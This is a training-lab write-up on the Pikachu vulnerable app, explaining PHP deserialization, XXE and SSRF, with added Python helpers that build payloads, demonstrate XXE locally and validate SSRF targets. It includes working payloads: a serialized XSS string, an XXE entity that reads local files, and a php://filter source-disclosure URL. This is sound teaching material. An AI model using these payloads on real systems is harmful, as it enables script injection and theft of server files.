Pikachu: PHP deserialization, XXE, SSRF

PHP deserialization
Before looking at this vulnerability you need to understand the two PHP functions serialize() and unserialize().
1. Serialization: serialize()
Put simply, serialization turns an object into a string that can be stored or transmitted. Take the following object:

    class S {
        public $test = "pikachu";
    }
    $s = new S();          // create an object
    echo serialize($s);    // serialize the object

    The serialized result looks like this: O:1:"S":1:{s:4:"test";s:7:"pikachu";}
        O:       an object
        1:       length of the class name (one character)
        S:       class name
        1:       number of properties in the object
        s:       data type of the property name (string)
        4:       length of the property name
        test:    property name
        s:       data type of the property value (string)
        7:       length of the property value
        pikachu: property value
    

2. Deserialization: unserialize()

This restores the serialized string to an object, which can then be used as before:

    $u = unserialize('O:1:"S":1:{s:4:"test";s:7:"pikachu";}');
    echo $u->test;    // prints pikachu
    

Serialization and deserialization are not a problem by themselves. But if the content being deserialized is controlled by the user, and the PHP code behind it uses magic methods carelessly, this leads to security problems.

        Common magic methods:
        __construct()   called when an object is created

        __destruct()    called when an object is destroyed

        __toString()    called when an object is used as a string

        __sleep()       run before an object is serialized

        __wakeup()      called immediately after unserialize() rebuilds the object

        Vulnerable example:

        class S {
            var $test = "pikachu";
            function __destruct() {
                echo $this->test;       // the property is echoed unescaped when the object is destroyed
            }
        }
        $s = $_GET['test'];             // attacker-controlled serialized string
        @$unser = unserialize($s);      // rebuilds the object; __destruct() fires when $unser is freed

       

XSS caused by the deserialization interface

For example, we exploit this vulnerability by entering the following payload. When the rebuilt object is destroyed, __destruct() echoes the test property without escaping, so the script tag lands in the page:

payload: O:1:"S":1:{s:4:"test";s:29:"<script>alert('xss')</script>";}

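Hand-counting the s:N: lengths is error-prone, and unserialize() rejects a payload whose counts are wrong; the count is in bytes, so multibyte characters are a common trap. The following Python helper is an added example, not code from pikachu or the original post; it builds PHP serialize() output for the class S above (the PhpObject type and pikachu_xss_payload() are names chosen for this example) and also handles protected and private properties, whose names PHP wraps in NUL bytes:

```python
# Added example (Python), not code from pikachu or the original post.
# Builds PHP serialize() strings. PHP's s:N:"..." prefix counts BYTES,
# so a payload with multibyte characters or a miscounted length is
# rejected by unserialize(); this helper computes every length.
from dataclasses import dataclass, field


@dataclass
class PhpObject:
    """Object to serialize as O:len:"Class":n:{...}."""
    class_name: str
    props: dict                                  # property name -> value
    protected: set = field(default_factory=set)  # emitted as "\0*\0name"
    private: set = field(default_factory=set)    # emitted as "\0Class\0name"


def _php_string(s: str) -> str:
    return 's:%d:"%s";' % (len(s.encode("utf-8")), s)   # length in bytes


def php_serialize(value) -> str:
    """Serialize None/bool/int/float/str/list/dict/PhpObject the way PHP does.
    The returned str must be sent UTF-8 encoded for the byte counts to match."""
    if value is None:
        return "N;"
    if isinstance(value, bool):                     # before int: bool is an int subclass
        return "b:%d;" % int(value)
    if isinstance(value, int):
        return "i:%d;" % value
    if isinstance(value, float):
        return "d:%r;" % value
    if isinstance(value, str):
        return _php_string(value)
    if isinstance(value, (list, tuple)):            # PHP array with integer keys
        body = "".join(php_serialize(i) + php_serialize(v) for i, v in enumerate(value))
        return "a:%d:{%s}" % (len(value), body)
    if isinstance(value, dict):                     # PHP associative array
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return "a:%d:{%s}" % (len(value), body)
    if isinstance(value, PhpObject):
        body = ""
        for name, v in value.props.items():
            if name in value.private:
                key = "\0%s\0%s" % (value.class_name, name)
            elif name in value.protected:
                key = "\0*\0%s" % name
            else:
                key = name
            body += _php_string(key) + php_serialize(v)
        cls_len = len(value.class_name.encode("utf-8"))
        return 'O:%d:"%s":%d:{%s}' % (cls_len, value.class_name, len(value.props), body)
    raise TypeError("cannot serialize %r" % type(value))


def pikachu_xss_payload(js: str = "<script>alert('xss')</script>") -> str:
    """The post's payload: class S with public $test holding the script."""
    return php_serialize(PhpObject("S", {"test": js}))


if __name__ == "__main__":
    print(php_serialize(PhpObject("S", {"test": "pikachu"})))
    print(pikachu_xss_payload())
    # multibyte value: 3 characters but 9 bytes, so the prefix is s:9:
    print(php_serialize(PhpObject("S", {"test": "\u76ae\u5361\u4e18"})))
```

Note that the NUL bytes in protected and private property names count toward the length and must survive transport; in a GET parameter they have to be sent as %00.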
XXE (XML External Entity injection)
In one sentence: the attacker injects a crafted XML entity into content sent to the server; the server expands it according to the entity definition, and that is what causes the problem.
That is, the server receives and parses XML data from the client without strict security controls, resulting in XML external entity injection.

Enter this payload:

<?xml version="1.0"?>
<!DOCTYPE note [
<!ENTITY hacker "ESHLkangi">
]>
<name>&hacker;</name>

We can see that the value defined for the entity is returned, so the XML is parsed normally. This is still an internal entity; it only confirms that the parser honours entity declarations.

Now we define an external entity with the SYSTEM keyword. It supports a number of protocols for reading external data, for example file:///etc/passwd on Linux.

I use Windows, so I simply read a local file.

payload:

<?xml version="1.0"?>
<!DOCTYPE ANY [
<!ENTITY f SYSTEM "file:///C:/phpstudy1/PHPTutorial/WWW/cookie.txt">
]>
<x>&f;</x>
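The same payload against a parser you can run locally, as an added example that is not pikachu's code or the post's: it uses Python's xml.sax (expat) rather than PHP's XML functions, and the "secret" file is a constructed temporary file instead of the cookie.txt above. It parses the document twice, once with external general entities disabled (the safe default) and once with them enabled, which is the XXE condition:

```python
# Added example (Python, xml.sax/expat), not code from pikachu or the
# original post. Demonstrates what a SYSTEM entity does when the parser
# is allowed to resolve external general entities, and what it does when not.
import io
import os
import pathlib
import tempfile
import xml.sax
from xml.sax import handler


class TextCollector(handler.ContentHandler):
    """Collects the character data the parser reports for the document."""

    def __init__(self):
        super().__init__()
        self.text = []

    def characters(self, content):
        self.text.append(content)


def parse_with_entities(xml_bytes: bytes, resolve_external: bool) -> str:
    """Parse xml_bytes and return its text content.
    resolve_external=True is the vulnerable configuration."""
    parser = xml.sax.make_parser()
    # feature_external_ges controls whether SYSTEM general entities are fetched.
    parser.setFeature(handler.feature_external_ges, resolve_external)
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.text)


def xxe_demo(resolve_external: bool) -> str:
    """Write a constructed secret file, then parse the post's payload pointed
    at it. Returns whatever text the parser produced for <x>."""
    with tempfile.NamedTemporaryFile(mode="w", suffix=".txt", delete=False,
                                     encoding="utf-8") as f:
        # constructed sample content standing in for cookie.txt; not real data
        f.write("PHPSESSID=constructed-secret-value\n")
        secret_path = f.name
    try:
        payload = (
            '<?xml version="1.0"?>\n'
            '<!DOCTYPE ANY [\n'
            '<!ENTITY f SYSTEM "%s">\n'
            ']>\n'
            '<x>&f;</x>\n' % pathlib.Path(secret_path).as_uri()   # file:///... URL
        )
        return parse_with_entities(payload.encode("utf-8"), resolve_external)
    finally:
        os.unlink(secret_path)


if __name__ == "__main__":
    print("external entities disabled:", repr(xxe_demo(False)))
    print("external entities enabled: ", repr(xxe_demo(True)))
```

With resolution disabled the element is empty; with it enabled the file's contents come back in place of &f;, which is exactly what the server echoes in the pikachu exercise. In PHP the switch that turns substitution on is the LIBXML_NOENT option to the XML loading functions; the fix is to never pass it for untrusted input and to keep external entity loading disabled.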
SSRF

SSRF (Server-Side Request Forgery)

It usually arises because the server offers a feature that fetches data from other servers but does not strictly filter the destination address. An attacker can therefore pass an arbitrary address, make the back-end server send a request to it, and receive the data the server fetched from that destination.

Data flow: attacker -----> server ----> destination address

Depending on the back-end function used, the impact and the way it is exploited differ.

The following PHP functions lead to SSRF when used improperly:
file_get_contents()
fsockopen()
curl_exec()
           
If the back-end server must fetch a resource from an address the user specifies (or one embedded in the front-end request), check and filter the destination address.
1. SSRF (curl)

Payload: replace the value of the url parameter with our own address, for example

http://192.168.174.130/cookie.txt
2. SSRF (file_get_contents)

payload: php://filter/read=convert.base64-encode/resource=ssrf.php

The page outputs the PHP file to the front end base64-encoded; decoding it recovers the source. file_get_contents() accepts PHP stream wrappers, so the php://filter wrapper turns this "SSRF" into a read of a local file on the server rather than a request to a remote host, which is why the destination check has to reject schemes as well as addresses.
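An added example (not pikachu's code or the post's) of the destination check the post asks for, written in Python. It allows only http and https (so php://, file://, gopher:// and the like are rejected), refuses credentials in the URL, and requires every address the host resolves to be globally routable, which excludes private, loopback and link-local ranges (including the cloud metadata address 169.254.169.254). The resolver is injectable so the demo runs offline against CONSTRUCTED_DNS; the names example.test and evil.test and the address 93.184.216.34 in that table are made up for the demo:

```python
# Added example (Python), not code from pikachu or the original post.
# Validates the destination of a server-side fetch before it is made.
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}   # php://, file://, gopher://, dict:// are all rejected


def resolve_all(host: str):
    """Default resolver: every address the name resolves to (A and AAAA)."""
    infos = socket.getaddrinfo(host, None)
    return sorted({ipaddress.ip_address(info[4][0]) for info in infos})


def check_ssrf_target(url: str, resolve=resolve_all):
    """Return (ok, reason). ok is True only if url is http(s), carries no
    credentials, and every address its host resolves to is globally routable."""
    try:
        parts = urlsplit(url)
        _ = parts.port                       # raises ValueError on a malformed port
    except ValueError as e:
        return False, "unparseable url: %s" % e
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, "scheme %r not allowed" % parts.scheme
    if parts.username is not None or parts.password is not None:
        return False, "credentials in the url are not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        addrs = [ipaddress.ip_address(host)]  # IP literal (incl. [::1]): no lookup needed
    except ValueError:
        try:
            addrs = list(resolve(host))
        except (socket.gaierror, ValueError) as e:
            return False, "cannot resolve %r: %s" % (host, e)
    if not addrs:
        return False, "no addresses for %r" % host
    for addr in addrs:
        mapped = getattr(addr, "ipv4_mapped", None)   # ::ffff:10.0.0.1 -> 10.0.0.1
        if mapped is not None:
            addr = mapped
        # is_global is False for private, loopback, link-local (cloud metadata
        # 169.254.169.254), unspecified, multicast and reserved ranges.
        if not addr.is_global:
            return False, "%s resolves to non-public address %s" % (host, addr)
    return True, "ok"


# Constructed DNS table for offline demonstration; none of these are real records.
CONSTRUCTED_DNS = {
    "example.test": ["93.184.216.34"],
    "evil.test": ["93.184.216.34", "127.0.0.1"],   # one public and one internal record
}


def fake_resolve(table):
    """Build a resolver over a constructed name -> addresses table."""
    def resolve(host):
        if host not in table:
            raise socket.gaierror("constructed resolver: no such host %r" % host)
        return [ipaddress.ip_address(a) for a in table[host]]
    return resolve


if __name__ == "__main__":
    resolver = fake_resolve(CONSTRUCTED_DNS)
    for candidate in [
        "http://example.test/cookie.txt",
        "http://192.168.174.130/cookie.txt",
        "php://filter/read=convert.base64-encode/resource=ssrf.php",
        "http://169.254.169.254/latest/meta-data/",
        "http://evil.test/",
    ]:
        print(candidate, "->", check_ssrf_target(candidate, resolver))
```

The post's own lab target 192.168.174.130 is rejected because it is a private address, which is the intended outcome: the feature should only reach public hosts. Two caveats a practitioner would add: the check must be repeated on every redirect the fetch follows, and the request should be made to the address that was checked rather than resolving the name a second time, otherwise a DNS answer that changes between check and use (rebinding) defeats it.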
Source: www.cnblogs.com/Zh1z3ven/p/12616143.html